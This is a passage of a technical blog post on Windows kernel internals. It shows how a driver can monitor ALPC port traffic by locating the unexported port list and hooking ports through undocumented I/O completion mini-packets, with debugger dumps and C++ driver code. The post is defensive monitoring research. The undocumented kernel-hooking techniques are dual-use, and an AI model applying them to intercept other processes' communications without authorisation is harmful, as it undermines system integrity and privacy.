fffff801`7605672c nt!AlpcpFlushMessagesPort (<no parameter info>)
fffff801`75cebf3c nt!AlpcpQueueIoCompletionPort (<no parameter info>)
fffff801`7605a140 nt!AlpcpInitializePort (<no parameter info>)
fffff801`760592c8 nt!AlpcpAcceptConnectPort (<no parameter info>)
fffff801`75f98d7c nt!AlpcpReferenceMessageByWaitingThreadPort (<no parameter info>)
fffff801`760565c4 nt!AlpcpFlushResourcesPort (<no parameter info>)
fffff801`76057f0c nt!AlpcpEnumerateResourcesPort (<no parameter info>)
fffff801`7605a2f4 nt!AlpcpCreateClientPort (<no parameter info>)
fffff801`760b1e98 nt!AlpcpCreateConnectionPort (<no parameter info>)
fffff801`760a83f4 nt!AlpcpOpenPort (<no parameter info>)
fffff801`76056bc4 nt!AlpcpDisconnectPort (<no parameter info>)
fffff801`7605a888 nt!AlpcpSetOwnerProcessPort (<no parameter info>)
fffff801`76055fe8 nt!AlpcpDestroyPort (<no parameter info>)
fffff801`760756d8 nt!AlpcpConnectPort (<no parameter info>)
fffff801`7606d144 nt!AlpcpAssociateIoCompletionPort (<no parameter info>)
fffff801`76209900 nt!AlpcpLogClosePort (<no parameter info>)
fffff801`76055d58 nt!AlpcpDeletePort (<no parameter info>)
fffff801`7602c8e0 nt!AlpcpReceiveMessagePort (<no parameter info>)
[/CODE]

One good candidate for a deeper look is NtAlpcSetInformation, which calls AlpcpInitializeCompletionList, and that ends by calling IoAllocateMiniCompletionPacket - and this last routine should sound pretty familiar now!

OK, but what is happening there? It is another callback mechanism – *CompletionIo*, already described in Windows Internals 6th edition, Part 2 (I/O Completion Ports). And this callback mechanism is set up by default, as you have already seen, to call nt!AlpcpLookasidePacketCallbackRoutine. It is obvious that it is possible to intercept the mechanism by rewriting this callback, but this is not what we want to do …

When we look at this default function, we can see how this callback mechanism works. nt!IoSetIoCompletionEx2 ends in nt!IoSetIoCompletionEx, and nt!AlpcpDeferredFreeCompletionPacketLookaside ends by calling nt!IoFreeMiniCompletionPacket for each packet in the queue.
init : nt!IoAllocateMiniCompletionPacket
registering : nt!IoSetIoCompletionEx
free : nt!IoFreeMiniCompletionPacket

[CODE]
NTKERNELAPI
void
NTAPI
IoSetIoCompletionEx(
    __inout void* completionPort,
    __in const void* keyContext,
    __in const void* apcContext,
    __in ULONG_PTR ioStatus,
    __in ULONG_PTR ioStatusInformation,
    __in bool allocPacketInfo,
    __in const void* ioMiniCompletionPacketUser
    );
[/CODE]

And now how to set up your own callback packet:

[CODE]
// RAII wrapper: the packet goes back through IoFreeMiniCompletionPacket when the owner is destroyed
std::unique_ptr<void, decltype(&IoFreeMiniCompletionPacket)> m_pPacket(
    IoAllocateMiniCompletionPacket(MiniPacketCallbackInterceptor, this),
    IoFreeMiniCompletionPacket);

...

bool
StartIntercepting(
    __in _ALPC_PORT* alpcPort,
    __in void* keyContext
    )
{
    ...
    // queue our packet on the port's completion port under the chosen key;
    // the raw pointer is passed, ownership stays with m_pPacket
    IoSetIoCompletionEx(
        alpcPort->CompletionPort,
        keyContext,
        nullptr,
        0,
        0,
        FALSE,
        m_pPacket.get());
    ...
[/CODE]

So now we are almost done, but one essential thing is missing – the ALPC port itself to attach to .. and there exist some approaches to find it:

[h=3]!alpc /lpp[/h]

kdexts.dll does it somehow, so here is the approach: … unfortunately nt!AlpcpPortList is not an exported symbol, but its location is inside this 'structure': one member of this structure which can be found quite easily is nt!AlpcPortObjectType, which is not directly exported, but fortunately for us nt!LpcPortObjectType is an alias to it!
And there is also another way to get it (not so comfortable) – querying it:

[CODE]
// Look up an object type by name in the \ObjectTypes directory.
// objectName (the UNICODE_STRING to match) and the OBJECT_DIRECTORY /
// OBJECT_DIRECTORY_ENTRY / OBJECT_TYPE layouts come from the caller's own
// definitions taken from the public symbols.
UNICODE_STRING obj_dir = RTL_CONSTANT_STRING(L"\\ObjectTypes");
OBJECT_ATTRIBUTES objAttributes;
InitializeObjectAttributes(
    &objAttributes,
    &obj_dir,
    OBJ_CASE_INSENSITIVE | OBJ_KERNEL_HANDLE,
    nullptr,
    nullptr);

HANDLE h_dir;
NTSTATUS status = ZwOpenDirectoryObject(&h_dir, DIRECTORY_QUERY, &objAttributes);
if (!NT_SUCCESS(status))
    return nullptr;

OBJECT_DIRECTORY* object_dir;
status = ObReferenceObjectByHandle(h_dir, 0, nullptr, KernelMode,
                                   reinterpret_cast<void**>(&object_dir), nullptr);
ZwClose(h_dir);   // the object reference, not the handle, keeps the directory alive
if (!NT_SUCCESS(status))
    return nullptr;

// walk every hash bucket and every chain inside it
for (size_t i = 0; i < _countof(object_dir->HashBuckets); i++)
{
    for (OBJECT_DIRECTORY_ENTRY* dir_entry = object_dir->HashBuckets[i];
         dir_entry;
         dir_entry = dir_entry->ChainLink)
    {
        DbgPrint("\nObject : %wZ", &dir_entry->Object->Name);
        if (!RtlCompareUnicodeString(&dir_entry->Object->Name, &objectName, TRUE))
            return &dir_entry->Object;   // POBJECT_TYPE*, same shape as the exported *ObjectType symbols
    }
}
[/CODE]

To successfully locate this structure, and the port list itself, inside the ntoskrnl image, just add additional checks of predictable values of some members of the structure alongside the equality of the value with nt!AlpcPortObjectType.

[h=3]ObFiltering[/h]

Another option *should* be the official one, but in reality … Ob Filters, registering on nt!AlpcPortObjectType: the mechanism is ready to use and it is already implemented in the kernel! But you have some obstacles:

nt!AlpcPortObjectType vs ObjectTypes

[CODE]
Object : TmTm
Object : Desktop
Object : Process
Object : DebugObject
Object : TpWorkerFactory
Object : Adapter
Object : Token
Object : EventPair
Object : PcwObject
Object : WmiGuid
Object : EtwRegistration
Object : Session
Object : Timer
Object : Mutant
Object : IoCompletion
Object : WindowStation
Object : Profile
Object : File
Object : Semaphore
Object : EtwConsumer
[/CODE]

A lot of objects to query for; what are their object types?
[CODE]
kd> x nt!*objecttype
fffff800`02871780 nt!TmResourceManagerObjectType = <no type information>
fffff800`028fd5e0 nt!IoDeviceHandlerObjectType = <no type information>
fffff800`028fc3a0 nt!ExMutantObjectType = <no type information>
fffff800`028fc3a8 nt!ExTimerObjectType = <no type information>
fffff800`028737e8 nt!ObpTypeObjectType = <no type information>
fffff800`028737e0 nt!ObpDirectoryObjectType = <no type information>
fffff800`028fc180 nt!IoDriverObjectType = <no type information>
fffff800`028683e8 nt!ExpWorkerFactoryObjectType = <no type information>
fffff800`028fc1d8 nt!IoCompletionObjectType = <no type information>
fffff800`02867430 nt!EtwpRegistrationObjectType = <no type information>
fffff800`028795f0 nt!MmSessionObjectType = <no type information>
fffff800`028bd8a0 nt!LpcWaitablePortObjectType = <no type information>
fffff800`02870450 nt!WmipGuidObjectType = <no type information>
fffff800`028fc110 nt!MmSectionObjectType = <no type information>
fffff800`028fc298 nt!ExEventPairObjectType = <no type information>
fffff800`02a40ba0 nt!SepSetAuditInfoForObjectType (<no parameter info>)
fffff800`028bd8a8 nt!LpcPortObjectType = <no type information>
fffff800`02b91050 nt!CmKeyObjectType = <no type information>
fffff800`028717a0 nt!TmTransactionObjectType = <no type information>
fffff800`028fc6c8 nt!IoControllerObjectType = <no type information>
fffff800`028682f8 nt!ExProfileObjectType = <no type information>
fffff800`028fc0a0 nt!ExEventObjectType = <no type information>
fffff800`028fc838 nt!IoAdapterObjectType = <no type information>
fffff800`02868258 nt!ExpKeyedEventObjectType = <no type information>
fffff800`02b91070 nt!SeTokenObjectType = <no type information>
fffff800`02868760 nt!ExWindowStationObjectType = <no type information>
fffff800`028fc398 nt!ExSemaphoreObjectType = <no type information>
fffff800`0297bb54 nt!ObGetObjectType (<no parameter info>)
fffff800`028fc048 nt!IoFileObjectType = <no type information>
fffff800`028717a8 nt!TmEnlistmentObjectType = <no type information>
fffff800`02867568 nt!EtwpRealTimeConnectionObjectType = <no type information>
fffff800`028b9858 nt!AlpcPortObjectType = <no type information>
fffff800`02871778 nt!TmTransactionManagerObjectType = <no type information>
fffff800`026edb30 nt!SeComputeAutoInheritByObjectType (<no parameter info>)
fffff800`02853f40 nt!DbgkDebugObjectType = <no type information>
fffff800`028fc540 nt!IoDeviceObjectType = <no type information>
fffff800`02ad55d0 nt!ObCreateObjectType (<no parameter info>)
fffff800`028737d8 nt!ObpSymbolicLinkObjectType = <no type information>
fffff800`02864e10 nt!PopPowerRequestObjectType = <no type information>
fffff800`02868910 nt!ExCallbackObjectType = <no type information>
fffff800`02868758 nt!ExDesktopObjectType = <no type information>
[/CODE]

And how many are officially supported and exported for kernel developers?

[CODE]
extern POBJECT_TYPE *CmKeyObjectType;
extern POBJECT_TYPE *IoFileObjectType;
extern POBJECT_TYPE *ExEventObjectType;
extern POBJECT_TYPE *ExSemaphoreObjectType;
extern POBJECT_TYPE *TmTransactionManagerObjectType;
extern POBJECT_TYPE *TmResourceManagerObjectType;
extern POBJECT_TYPE *TmEnlistmentObjectType;
extern POBJECT_TYPE *TmTransactionObjectType;
extern POBJECT_TYPE *PsProcessType;
extern POBJECT_TYPE *PsThreadType;
extern POBJECT_TYPE *SeTokenObjectType;
[/CODE]

nt!AlpcPortObjectType is not among the exported ones .. but still no big deal, we can query it by object directory, as we already did in the first approach.
nt!_OBJECT_TYPE vs "ALPC Port"

[CODE]
lkd> dt nt!_OBJECT_TYPE poi(nt!AlpcPortObjectType) -b
   +0x000 TypeList : _LIST_ENTRY [ 0xffffe001`170b9e00 - 0xffffe001`170b9e00 ]
      +0x000 Flink : 0xffffe001`170b9e00
      +0x008 Blink : 0xffffe001`170b9e00
   +0x010 Name : _UNICODE_STRING "ALPC Port"
      +0x000 Length : 0x12
      +0x002 MaximumLength : 0x14
      +0x008 Buffer : 0xffffc000`2c287190 "ALPC Port"
   +0x020 DefaultObject : 0x00000000`000000e1
   +0x028 Index : 0x26 '&'
   +0x02c TotalNumberOfObjects : 0x3c4
   +0x030 TotalNumberOfHandles : 0x3b7
   +0x034 HighWaterNumberOfObjects : 0x4d1
   +0x038 HighWaterNumberOfHandles : 0x4c0
   +0x040 TypeInfo : _OBJECT_TYPE_INITIALIZER
      +0x000 Length : 0x78
      +0x002 ObjectTypeFlags : 0x10 ''
      +0x002 CaseInsensitive : 0y0
      +0x002 UnnamedObjectsOnly : 0y0
      +0x002 UseDefaultObject : 0y0
      +0x002 SecurityRequired : 0y0
      +0x002 MaintainHandleCount : 0y1
      +0x002 MaintainTypeList : 0y0
      +0x002 SupportsObjectCallbacks : 0y0
      +0x002 CacheAligned : 0y0
      +0x004 ObjectTypeCode : 0
      +0x008 InvalidAttributes : 0x80
      +0x00c GenericMapping : _GENERIC_MAPPING
         +0x000 GenericRead : 0x20001
         +0x004 GenericWrite : 0x10001
         +0x008 GenericExecute : 0
         +0x00c GenericAll : 0x1f0001
      +0x01c ValidAccessMask : 0x1f0001
      +0x020 RetainAccess : 0
      +0x024 PoolType : 200 ( NonPagedPoolNx )
      +0x028 DefaultPagedPoolCharge : 0
      +0x02c DefaultNonPagedPoolCharge : 0x248
      +0x030 DumpProcedure : (null)
      +0x038 OpenProcedure : 0xfffff801`760a83f4
      +0x040 CloseProcedure : 0xfffff801`76056330
      +0x048 DeleteProcedure : 0xfffff801`76055d58
      +0x050 ParseProcedure : (null)
      +0x058 SecurityProcedure : 0xfffff801`75fe0e44
      +0x060 QueryNameProcedure : (null)
      +0x068 OkayToCloseProcedure : (null)
      +0x070 WaitObjectFlagMask : 0
      +0x074 WaitObjectFlagOffset : 0
      +0x076 WaitObjectPointerOffset : 0
   +0x0b8 TypeLock : _EX_PUSH_LOCK
      +0x000 Locked : 0y0
      +0x000 Waiting : 0y0
      +0x000 Waking : 0y0
      +0x000 MultipleShared : 0y0
      +0x000 Shared : 0y000000000000000000000000000000000000000000000000000000000000 (0)
      +0x000 Value : 0
      +0x000 Ptr : (null)
   +0x0c0 Key : 0x43504c41
   +0x0c8 CallbackList : _LIST_ENTRY [ 0xffffe001`170b9ec8 - 0xffffe001`170b9ec8 ]
      +0x000 Flink : 0xffffe001`170b9ec8
      +0x008 Blink : 0xffffe001`170b9ec8
[/CODE]

Ehmm, callbacks disabled (SupportsObjectCallbacks : 0y0 above), but still we can patch it (as others up to Win7 already did). PatchGuard from Win8.1: no, you cannot patch it anymore!

How To

OK, so Ob filtering on "ALPC Port" is NOT allowed, yet! But you still know what you are looking for, so you can do it anyway, by walking through the list at the appropriate moments and using the first method:

[CODE]
// Image-load callback: when a process of interest maps a new image, find its ALPC ports and hook them
void
CAlpcMonitor::CreateImageNotify(
    __in_opt UNICODE_STRING* fullImageName,
    __in HANDLE processId,
    __in IMAGE_INFO* imageInfo
    )
{
    if (!imageInfo)
        return;

    auto proc = CProcessMonitor::GetInstance().ProcContainer().ObtainRef(processId);
    if (!proc.get())
        return;

    if (!proc->IsNetworkProcess)
        return;

    // take the port list lock shared while walking nt!AlpcpPortList
    CAutoLock<EX_PUSH_LOCK, CSharedLockWorker> lock(&CNt::GetInstance().AlpcInfo()->AlpcpPortListLock);

    for (auto port = CNt::GetInstance().AlpcInfo()->AlpcpPortList;
         port != CNt::GetInstance().AlpcInfo()->AlpcpPortListTail;
         port = CONTAINING_RECORD(port->PortListEntry.Flink, _ALPC_PORT, PortListEntry))
    {
        if (!port->OwnerProcess)
            continue;

        if (processId != PsGetProcessId(port->OwnerProcess))
            continue;

        InstallHook(port);
    }
}
[/CODE]

And you can be even more specific while monitoring, because communication with svchost, or another generic service, is not an information bomb at all, but you can look at it through service names, which can be far more useful!
[CODE]
service : PlugPlay
service : Power
service : DcomLaunch
service : RpcEptMapper
service : RpcSs
service : eventlog
service : AudioEndpointBuilder
service : MMCSS
service : AudioSrv
service : CscService
service : gpsvc
service : ProfSvc
service : Themes
service : EventSystem
service : SENS
service : UxSms
service : SamSs
service : lmhosts
service : nsi
service : Dhcp
service : Dnscache
service : ShellHWDetection
service : Schedule
service : Spooler
service : BFE
service : MpsSvc
service : LanmanWorkstation
service : CryptSvc
service : DPS
service : FDResPub
service : NlaSvc
service : PcaSvc
service : SysMain
service : TrkWks
service : Winmgmt
service : iphlpsvc
service : LanmanServer
service : netprofm
service : WdiServiceHost
service : WPDBusEnum
service : WdiSystemHost
service : WinHttpAutoProxySvc
service : Browser
service : WSearch
service : Netman
service : WMPNetworkSvc
service : fdPHost
service : HomeGroupProvider
service : SSDPSRV
service : BITS
[/CODE]

An article about resolving a service name by its id (SubProcessTag) you can find here, a more concrete example of an implementation is written here, and you can also find it in Process Hacker. This method was designed for user mode, but in the kernel you are there by construction, so let's say it is more straightforward to resolve this information.

By the way, in your IoCompletion ALPC callback, your minipacket contains a KeyContext which looks like:

[CODE]
enum KeyContextMembers
{
    TppAlpcpExecuteCallback = 0,            // ntdll
    AlpcPortType = 2,
    TppAlpcpCleanupGroupMemberVFuncs = 3,   // ntdll
    LrpcIoComplete = 12,                    // rpcrt4
    LrpcServerIoHandlerPtr = 13,            // rpcrt4
    SubProcessTag = 15,                     // TEB
};
[/CODE]

Conclusions:

IoCompletion callbacks seem to be a really helpful mechanism. It works only on ports that use the I/O completion port type, not on all ALPC ports, but for network monitoring purposes it seems fair enough.

Another limitation is the 'limited' usage of Ob Filters on ALPC ports. It is quite a nice feature, but so limited … I hope filtering will support at least nt!AlpcPortObjectType soon!

At the end of this post, I would like to thank Alex Ionescu for reviewing this article, and for that nice Syscan win-internals training!

Source: ALPC monitoring | @ZER0mem